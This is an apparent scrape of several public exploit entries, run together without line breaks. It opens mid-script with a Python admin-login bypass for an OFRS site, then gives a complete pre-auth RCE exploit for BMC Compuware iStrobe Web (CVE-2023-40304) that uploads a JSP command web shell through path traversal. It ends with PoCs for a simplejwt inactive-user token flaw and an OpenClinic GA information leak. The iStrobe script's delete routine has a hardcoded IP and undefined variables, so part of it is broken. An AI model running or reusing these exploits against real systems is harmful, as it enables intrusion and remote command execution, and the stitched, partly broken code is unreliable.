(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded', 'Custom-Header': 'Your-Custom-Value' } try: response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False) if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']: print("Requests version: Admin Panel Successfully Bypassed !") url_selenium = "http://localhost/ofrs/admin/index.php" chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe" chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("executable_path=" + chrome_driver_path) driver = webdriver.Chrome(options=chrome_options) driver.get(url_selenium) pyautogui.typewrite(payload_requests) pyautogui.press('tab') pyautogui.typewrite(payload_requests) pyautogui.press('enter') WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php")) screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png") driver.save_screenshot(screenshot_path) print(f"Selenium version: Screenshot saved as {screenshot_path}") driver.quit() else: print("Requests version: Login failed.") except Exception as e: print(f"An error occurred: {e}")

#!/usr/bin/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web # Date: 01-08-2023 # Exploit Author: trancap # Vendor Homepage: https://www.bmc.com/ # Version: BMC Compuware iStrobe Web - 20.13 # Tested on: zOS# CVE : CVE-2023-40304 # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files) # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed. import requests import urllib.parse import argparse import sys def upload_web_shell(url): data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@ page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));String s=\"\";while((s=stdInput.readLine()) != null){out.println(s);};s=\"\";while((s=stdError.readLine()) != null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"} # If encoded, the web shell will not be uploaded properly data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!') # Checking if web shell already uploaded r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False) if r.status_code != 404: return r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data, verify=False) if r.status_code == 200: print(f"[+] Successfully uploaded web shell, it should be accessible at {url}/istrobe/jsp/userhelp/ws.jsp") else: sys.exit("[-] Something went wrong while uploading the web shell") def delete_web_shell(url): paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"} response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp", data=paramsPost, headers=headers, cookies=cookies) if r.status_code == 200: print(f"[+] Successfully deleted web shell") else: sys.exit("[-] Something went wrong while deleting the web shell") def run_cmd(url, cmd): data = f"cmd={cmd}" r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data, verify=False) if r.status_code == 200: print(r.text) else: sys.exit(f'[-] Something went wrong while executing "{cmd}" command') parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE') parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target') parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami') parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true') args = parser.parse_args() upload_web_shell(args.url) run_cmd(args.url, args.cmd) if args.rm: delete_web_shell(args.url)

# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure # Date: 26/01/2024 # Exploit Author: Dhrumil Mistry (dmdhrumilmistry) # Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/ # Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1 # Version: <= 5.3.1 # Tested on: MacOS # CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable. # This vulnerability has the potential to cause various security issues, # including Business Object Level Authorization (BOLA), Business Function # Level Authorization (BFLA), Information Disclosure, etc. The vulnerability # arises from the fact that a user can access web application resources even # after their account has been disabled, primarily due to the absence of proper # user validation checks. # If a programmer generates a JWT token for an inactive user using `AccessToken` # class and `for_user` method then a JWT token is returned which can be used for # authentication across the django and django rest framework application. # Start Django Shell using below command: # python manage.py shell # ---------------------------------------- # Create inactive user and generate token for the user from django.contrib.auth.models import User from rest_framework_simplejwt.tokens import AccessToken # create inactive user inactive_user_id = User.objects.create_user('testuser', '[email protected]', 'testPassw0rd!', is_active=False).id # django application programmer generates token for the inactive user AccessToken.for_user(User.objects.get(id=inactive_user_id)) # error should be raised since user is inactive # django application verifying user token AccessToken.for_user(User.objects.get(id=inactive_user_id)).verify() # no exception is raised during verification of inactive user token

# Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure # Date: 2023-08-14 # Exploit Author: VB # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40278 # Details An Information Disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The issue arises due to improper handling of error messages in response to manipulated input, allowing an attacker to deduce the existence of specific appointments. # Proof of Concept (POC) Steps to Reproduce: - Access the Vulnerable Component: - Navigate to the URL: http://[IP]:10088/openclinic/planning/printAppointmentPdf.jsp?AppointmentUid=1.1. - Manipulating the AppointmentUid Parameter: - Change the `AppointmentUid` parameter value to test different IDs. - For example, try different numerical values or formats. - Observing the Responses: - Note the system's response when accessing with different `AppointmentUid` values. - A "document is not open" error indicates the existence of an appointment with the specified ID. - A different error message or response indicates non-existence. - Confirming the Vulnerability: - The differing error messages based on the existence of an appointment confirm the Information Disclosure vulnerability. - This allows an unauthorized user to deduce whether specific appointments exist without direct access to appointment data. As a result, an attacker could deduce the number of appointments performed by private clinics, surgeries and private doctors.